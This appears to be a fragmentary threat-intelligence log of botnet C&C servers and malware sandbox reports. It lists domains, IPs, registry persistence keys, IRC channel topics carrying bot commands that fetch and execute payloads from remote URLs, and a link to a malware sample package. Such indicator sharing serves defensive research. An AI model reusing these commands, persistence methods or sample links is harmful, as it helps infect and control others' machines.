dc.studyingcenter-org.com(botnet hosted in China Beijing Chinanet Hebei Province Network)
dc.studyingcenter-org.com 123.183.217.32
dc.tvteam.info
dc.babypin.net
Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943
Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943
Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943
Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943
Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Taskman” = c:\RECYCLER\R-1-5-21-1482476501-1644491937-682003330-1013\winfixer.exe
Reads
bnet.doesntexist.org(botnet hosted in Ecuador Quito Puntonet S.a)
DNS Lookup
Host Name IP Address
xeonbox.homeip.net 200.105.228.106
webcache.dyndns.info 127.0.0.1
bnet.doesntexist.org 200.105.228.106
Outgoing connection to remote server: xeonbox.homeip.net TCP port 8888
Outgoing connection to remote server: webcache.dyndns.info TCP port 8888
Outgoing connection to remote server: xeonbox.homeip.net TCP port 8888
Remote Host Port Number
174.132.221.20 80
200.105.228.106 8888
NICK usr331420
USER root 8 * : some
urcdw.zavoddebila.com(botnet hosted in United States Fullerton Staminus Communications)
urcdw.zavoddebila.com DNS_TYPE_A 72.20.14.38
72.20.14.38:33333
Nick: {NOVA}[USA][XP-SP3]610119
Username: VirUs VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY
Joined Channel: ##Turb0-XXX##
PRIVMSG #d4 :Done..
PRIVMSG #d2 :Done..
Channel Topic for Channel ##Turb0-XXX##: “!NAZELturbo http://thenaturemedia.in/install.48691.exe ifasfa264.exe | !NAZELturbo http://7arhive.com/setup585.exe afasfa4.exe | !NAZELturbo http://img103.herosh.com/2011/02/09/666929080.gif fsaf24.exe | !NAZELturbo http://img104.herosh.com/2011/02/08/547715969.gif micro1.exe”
Private Message to Channel ##Turb0-XXX##: “Executed process “fsaf24.exe”.”
Private Message to Channel ##Turb0-XXX##: “Download
m3rcil3ss.co.cc(botnet hosted in Turkey Netinternet-net)
m3rcil3ss.co.cc DNS_TYPE_A 212.252.34.199
212.252.34.199:6667
Nick: [AUS|XP|620207]
Username: onfkyav
Server Pass: m3rc
Joined Channel: #m3rc with Password kxfcrt
Channel Topic for Channel #m3rc: “.p2p”
Private Message to Channel #m3rc: “[p2p]: Spreading to p2p folders.”
Set by ccc on Tue Dec 28 08:36:24
Private Message to User [AUS|XP|620207]: “VERSION”
Now talking in #2k38
Process Created:
Topic is
pantylost.mooo.com(botnet hosted in China Beijing Chinanet Gansu Province Networ
Botnet C&C irc
pantylost.mooo.com ip: 60.165.98.198
marinehh.twilightparadox.com ip: 60.165.98.198
stockingag.jumpingcrab.com ip: 60.165.98.198
pantylost.crabdance.com ip: 60.165.98.198
addr: onthebreak.UglyAs.com ip: 60.165.98.198
headmefc.AsSexyAs.com ip: 60.165.98.198
computercc.ignorelist.com ip: 60.165.98.198
sandtp.chickenkiller.com ip: 60.165.98.198
greenbarc.IsTheBe.st ip: 60.165.98.198
ringc.strangled.net ip: 60.165.98.198
60.165.98.198:8684
NICK [N00_USA_XP_39922187]
USER SP2-917 * 0 :COMPUTERNAME
Now talking in #blue3
Topic is ‘|.ddosstop -s|.stop -s|.patcher http://58.240.104.57:9008/logo.gif 0 -s|.shttp ftp://ccc:1@60.10.179.100:6054/282.gif
around 52 mb exe files
Here is another malware package, around 52 MB; inside you have multiple malware samples. Download: http://0b975bb5.tinylinks.co
dq.javagames7.com(malware hosted in United States Dallas Theplanet.com Internet Services Inc)
DNS Lookup
Host Name IP Address
dq.javagames7.com 174.121.62.122
Outgoing connection to remote server: dq.javagames7.com TCP port 8800
Outgoing connection to remote server: dq.javagames7.com TCP port 8800
Outgoing connection to remote server: dq.javagames7.com TCP port 8800
Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Taskman” = C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1413\syitm.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon “Shell” = explorer.exe,C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1413\syitm.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
69.162.99.180(malware hosted in United States Dallas Limestone Networks Inc)
Panel:
Outgoing connection to remote server: 69.162.99.180 TCP port 8083
Registry Changes by all processes
Create or Open
Changes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “Network” = rundll32.exe “C:\Dokumente und Einstellungen\Administrator\sys32config.dll”,network
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections “DefaultConnectionSettings” = [REG_BINARY, size: 91 bytes]
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections “SavedLegacySettings” = [REG_BINARY, size: 91 bytes]
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings “AutoConfigURL” = http://win32.z3nos.com:2011/set.pac
Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes “MS Shell Dlg 2”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared “CUAS”
master.easyanticheat.net(malware hosted in Sweden Power Och Random T-lane Ab)
DNS Lookup
Host Name IP Address
master.easyanticheat.net 80.67.10.234
Outgoing connection to remote server: master.easyanticheat.net TCP port 50301
Outgoing connection to remote server: 82.203.212.9 TCP port 50301
Outgoing connection to remote server: 78.47.251.150 TCP port 50301
Registry Changes by all processes
Create or Open
Changes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced “EnableBalloonTips” = [REG_DWORD, value: 00000001]
Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared “CUAS”
HKEY_CURRENT_USER\Keyboard Layout\Toggle